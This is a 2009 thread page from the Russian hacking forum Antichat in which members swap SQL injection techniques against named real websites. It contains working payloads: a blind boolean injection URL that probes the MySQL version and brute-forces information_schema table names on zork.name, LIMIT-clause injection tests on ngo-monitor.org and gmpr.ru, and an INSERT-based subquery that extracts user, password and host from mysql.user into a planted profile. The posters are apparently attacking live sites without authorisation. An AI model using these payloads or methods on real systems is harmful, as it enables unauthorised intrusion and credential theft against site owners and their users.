ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6071  
Старый 18.03.2009, 19:04
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от sj666  
Мм, я недавно начал заниматься sql inj поэтому туплю маленько.
Вот например пытаюсь подобрать кол-во столбцов в db_galery
http://www.danieldefo.ru/gallery.html?top=1;-- UNION SELECT 1 --
Ошибки нет, возвращается так же страница =\
Ты закрываешь коментом свой запрос вот он и проходит, вобше уязвимый параметр у нас в limit:
Цитата:
The LIMIT clause can be used to constrain the number of rows returned by the SELECT statement. LIMIT takes one or two numeric arguments, which must both be non-negative integer constants (except when using prepared statements).
2Byrger это не слепая, переводить можно и так(php)
echo "0x".bin2hex("здесь пишем чего хотим перевисти");

Последний раз редактировалось AkyHa_MaTaTa; 18.03.2009 в 19:06..
 
Ответить с цитированием

  #6072  
Старый 18.03.2009, 19:11
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от Byrger  
А где переводить в такую бяку?
https://forum.antichat.ru/showpost.php?p=1151651&postcount=657
 
Ответить с цитированием

  #6073  
Старый 18.03.2009, 19:22
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от sj666  
http://www.danieldefo.ru/gallery.html?top=1
Цитата:
После непродолжительных работ, сайт откроектся =)
Оставайтесь с нами!
Для тех, кто не знает кто такой даниельдефо - погуглите =)

А инъекция после лимита возможна. Более чем )
 
Ответить с цитированием

  #6074  
Старый 18.03.2009, 19:22
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

s_p_a_m
Там INSERT
http://www.zork.name/?view=2)+and+substring(version(),1,1)=(5

вот перебор, если нужен
http://www.zork.name/?view=2)+AND+ascii(lower(substring((select+table_n ame+from+information_schema.tables+limit+17,1),1,1 )))<(53

===============================
Цитата:
Сообщение от ElteRUS  
А инъекция после лимита возможна. Более чем )
Давай посмотрим реализацию Например тут:

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+

Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено

Последний раз редактировалось jokester; 18.03.2009 в 19:51..
 
Ответить с цитированием

  #6075  
Старый 18.03.2009, 19:54
Аватар для jangle
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

Цитата:
А инъекция после лимита возможна. Более чем )
INSERT? или есть еще что интересного?
 
Ответить с цитированием

  #6076  
Старый 18.03.2009, 19:57
Аватар для jangle
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

Цитата:
Давай посмотрим реализацию Например тут:

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'

http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+

Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено
Да я то же хочу посмотреть!!!!!
 
Ответить с цитированием

  #6077  
Старый 18.03.2009, 20:09
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от jokester  
С "ORDER BY", что-бы всё как положено
Если в запросе есть ордей бай то нельзя. Ну мне нужно было конкретизировать, сори что ввел вас в заблуждение
 
Ответить с цитированием

  #6078  
Старый 18.03.2009, 20:43
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://pastebin.com/m19eaa637


Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?

PHP код:
$result mysql_query("INSERT INTO Users
    (firstname,lastname,school_id,description,email,username,password)
    VALUES
    ('
$firstname','$lastname','$school_id','$form_number','$email','$username',
    Password('
$password'))"); 
В school_id только XSS...

В остальных переменных режутся хтмл и пхп strip_tags() функцией...не знаю,что и делать.Что касается проверки длины полей хтмл формы,то проверка идёт только на уровне приложения,а сервер отдыхает...Хотя бы поле password. Может,кто найдёт здесь sql inj или щё что-нибудь интересное ?

ПЫСЫ: Если что, то приму минусы в подарок,если написал не туда,куда полагается...

Последний раз редактировалось Велемир; 18.03.2009 в 20:52.. Причина: да вот)
 
Ответить с цитированием

  #6079  
Старый 18.03.2009, 21:12
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Код HTML:
http://www.gmpr.ru/news_item.php?id=699'

А дальше не воспринимает....
Код HTML:
http://www.gmpr.ru/news_item.php?id=699+group+by+400--
 
Ответить с цитированием

  #6080  
Старый 18.03.2009, 21:12
Аватар для PaCo
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Цитата:
Сообщение от Велемир  
http://pastebin.com/m19eaa637


Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?

PHP код:
$result mysql_query("INSERT INTO Users
    (firstname,lastname,school_id,description,email,username,password)
    VALUES
    ('
$firstname','$lastname','$school_id','$form_number','$email','$username',
    Password('
$password'))"); 

если $form_number уязвима и MySQL поддерживает подзапросы + кавычки не слешируються то можешь зделать своеобразный вывод в пользовательских профиле(естественно это имеет смысл еслу тебя есть доступ к данным пользователя), то есть что то типо такого:

$form_number = 1',(select concat_ws(0x3a,user,password,host) from mysql.user limit 1),'dodik','pass' /*

потом ишешь пользователя dodik и по идее у него в мыли будет лежать наш подзапрос.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ